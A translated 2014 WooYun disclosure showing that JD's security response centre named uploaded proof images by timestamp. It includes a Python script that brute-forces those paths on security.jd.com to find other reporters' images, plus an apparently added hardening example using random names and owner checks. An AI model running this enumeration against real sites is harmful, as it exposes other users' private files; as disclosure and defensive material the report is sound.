JD JSRC leaks the proof images of assorted vulnerability reports

Vulnerability details

Disclosure status:

2014-02-27: Details sent to the vendor, awaiting vendor handling
2014-03-04: Vendor has confirmed; details disclosed to the vendor only
2014-03-14: Details disclosed to core white hats and experts in the relevant field
2014-03-24: Details disclosed to regular white hats
2014-04-03: Details disclosed to intern white hats
2014-04-13: Details disclosed to the public

Brief description:

Haven't farmed bugs on WooYun in a long while. La-la-la, scrub-a-dub, la-la-la, scrub-a-dub.

Detailed description:

When submitting a vulnerability report and uploading a proof image, capturing the upload request reveals the image URL:

http://security.jd.com///Public//userfile//201402//27100414_.jpg

[screenshot: 1.jpg]

Analysing the URL shows that the renaming follows a predictable pattern:

201402 // year 2014, month 02

27100414 // day 27, 10:04:14



Based on this rule, the following Python code probes for image URLs:



__author__ = 'bingsec'

import datetime
import time
import http.client  # Python 3 replacement for the original httplib


def daterange(start_date, end_date):
    """Yield each day from start_date up to, but not including, end_date."""
    for n in range(int((end_date - start_date).days)):
        yield start_date + datetime.timedelta(n)


def get_status_code(host, path=""):
    """Retrieve the status code of a URL by sending a HEAD request, i.e. only
    the headers are requested. If the host cannot be reached or anything
    else goes wrong, return None instead.
    """
    try:
        conn = http.client.HTTPConnection(host, timeout=10)
        conn.request("HEAD", path)
        return conn.getresponse().status
    except Exception:
        return None


def GetResponse(url):
    code = get_status_code(taget_url, url)
    if code == 200:
        print("success:" + taget_url + url)
        WritePath(taget_url + url, "jd.txt")
    else:
        print('error: ' + taget_url + url)


def WritePath(content, filename):
    # append every hit to the results file
    with open(filename, "a") as writefile:
        writefile.write(content + "\r\n")


start_date = datetime.datetime(2013, 11, 1)
end_date = datetime.datetime(2014, 1, 31)
taget_url = 'security.jd.com'  # host to probe (variable name kept from the original)

for single_date in daterange(start_date, end_date):
    for hour in range(12, 24):  # the original's range(12, 24 + 1) also tried hour 24, which never exists
        for m in range(2, 60):
            for s in range(10, 60):
                # the original named this variable 'str', shadowing the builtin
                path = '/Public/userfile/' + time.strftime('%Y%m/%d' + '%02d%02d%02d' % (hour, m, s) + '_.jpg', single_date.timetuple())
                GetResponse(path)
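The naming rule above (a month directory plus the upload's DDhhmmss) is what makes the probe feasible: every name uploaded in one day lies within 86400 guesses. The following is an added example, not code from this report or from JD, that parses that scheme, contrasts its search space with random token names, and binds each stored file to its uploader so a leaked URL alone does not grant access; the path prefix and the UploadStore mapping are assumptions made for illustration.

```python
import re
import secrets
from datetime import datetime

# Scheme observed on this page: /Public/userfile/YYYYMM/DDhhmmss_.jpg
WEAK_NAME_RE = re.compile(r"^/Public/userfile/(\d{6})/(\d{8})_\.([a-z0-9]{1,5})$")
EXT_RE = re.compile(r"^[a-z0-9]{1,5}$")


def weak_name(ts: datetime, ext: str = "jpg") -> str:
    """Reproduce the timestamp-derived name so its search space can be reasoned about."""
    return ts.strftime("/Public/userfile/%Y%m/%d%H%M%S_.") + ext


def parse_weak_name(path: str):
    """Recover the upload time from a timestamp-derived path, or None if it does not match."""
    m = WEAK_NAME_RE.match(path)
    if m is None:
        return None
    return datetime.strptime(m.group(1) + m.group(2), "%Y%m%d%H%M%S")


def weak_candidates_per_day() -> int:
    """Second-resolution timestamps give at most 86400 distinct names per day."""
    return 24 * 60 * 60


def safe_name(ext: str = "jpg", token_bytes: int = 16) -> str:
    """Hardened: a 128-bit random token; the name leaks neither upload time nor uploader."""
    if not EXT_RE.match(ext):  # reject path fragments smuggled in via the extension
        raise ValueError("unexpected extension: %r" % ext)
    return "/Public/userfile/" + secrets.token_hex(token_bytes) + "." + ext


def safe_candidates(token_bytes: int = 16) -> int:
    return 2 ** (8 * token_bytes)


class UploadStore:
    """Owner-bound store (assumption: a real deployment keeps this mapping in a database).
    Even with unguessable names, reads are authorised against the uploader, so a leaked
    URL does not by itself expose someone else's proof image."""

    def __init__(self):
        self._owner = {}

    def save(self, owner: str, ext: str = "jpg") -> str:
        name = safe_name(ext)
        self._owner[name] = owner
        return name

    def can_read(self, requester: str, name: str) -> bool:
        return self._owner.get(name) == requester
```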

Proof of vulnerability:

Image URLs of other reports that the probe successfully discovered:


[screenshots: 2.jpg, 3.jpg, 4.jpg]


Fix recommendation:

Copyright notice: please credit the source when reposting: bing@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2014-03-04 09:16

Vendor reply:

Thank you very much for your attention to JD!

Latest status:

None yet


Vulnerability rating: